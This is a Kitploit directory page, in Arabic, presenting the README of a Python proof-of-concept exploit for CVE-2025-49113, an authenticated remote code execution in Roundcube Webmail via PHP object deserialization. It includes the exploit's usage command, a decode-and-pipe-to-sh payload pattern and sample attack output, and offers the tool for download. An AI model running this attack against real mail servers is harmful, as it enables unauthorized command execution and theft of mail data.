Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-49113 — 💥 استغلال Python لـ CVE-2025-49113 | ثغرة RCE في Roundcube Webmail عبر PHP Object Injection | Kitploit
أدوات/GitHubGitHub/00xcanelo/cve-2025-49113
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHub00xcanelo/cve-2025-49113

CVE-2025-49113

💥 استغلال Python لـ CVE-2025-49113 | ثغرة RCE في Roundcube Webmail عبر PHP Object Injection

عرض المستودع
86منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-49113 – استغلال تنفيذ الأوامر عن بُعد في Roundcube Webmail (إثبات المفهوم بلغة بايثون)

معرف CVE: CVE-2025-49113
نوع الاستغلال: تنفيذ أوامر عن بُعد (عبر حقن كائنات PHP)
التطبيق: Roundcube Webmail ≤ 1.5.9 و ≤ 1.6.10
لغة الاستغلال: بايثون
المؤلف: 00xCanelo
الحالة: تم اختباره ويعمل على تثبيتات Roundcube الضعيفة


📌 الوصف

يستغل هذا الاستغلال ثغرة في كيفية معالجة Roundcube Webmail لأسماء ملفات الصور المرفوعة التي يتم إلغاء تسلسلها ككائنات PHP. من خلال صياغة حمولة ضارة تؤدي إلى تشغيل سلسلة إلغاء تسلسل Crypt_GPG_Engine، يمكن تحقيق تنفيذ الأوامر عن بُعد بعد المصادقة.

يحاكي إثبات المفهوم بلغة بايثون سلسلة الهجوم المستخدمة في الاستغلال العام بلغة PHP، ولكن بمنطق أنظف، وتسجيل اختياري، وسهولة الاستخدام في إعدادات الأدوات الهجومية.


🚧 المتطلبات الأساسية

  • إصدار Roundcube ضعيف (≤1.5.9 أو ≤1.6.10)
  • بيانات اعتماد مستخدم صالحة على Roundcube
  • بيئة بايثون 3.x
  • pip install requests

🚀 خطوات الاستغلال

root@kitploit:~
python3 CVE-2025-49113.py <target_url> <username> <password> <command>

مثال:

root@kitploit:~
python3 CVE-2025-49113.py https://mail.target.htb/ [email protected] 'P@ssw0rd123' 'id'

🔐 سلسلة الضعف

تتيح فئة PHP Crypt_GPG_Engine تعيين حقل _gpgconf، والذي يتم تمريره بعد ذلك إلى تنفيذ الصدفة.

حمولتنا تصيغ:

root@kitploit:~
echo "<base64-encoded-cmd>" | base64 -d | sh

في _gpgconf، مما يؤدي إلى تنفيذ الأوامر عن بُعد عند إلغاء التسلسل.


💣 نموذج الإخراج

root@kitploit:~
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!

📁 هيكل الملفات

root@kitploit:~
.
├── CVE-2025-49113.py     # برنامج إثبات المفهوم بلغة بايثون
└── README.md             # هذا التوثيق

⚠️ إخلاء مسؤولية

هذا الكود مخصص لأغراض تعليمية واختبار أمني مصرح به فقط. أي إساءة استخدام لهذه الأداة ممنوع منعًا باتًا. المؤلف غير مسؤول عن أي أضرار ناتجة.


🧠 المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2025-49113
  • https://github.com/roundcube/roundcubemail/issues/9312
  • https://huntr.dev/bounties/f8e2a8e6-d1d7-44e1-93e1-367861c97a82/
تنزيل الأداة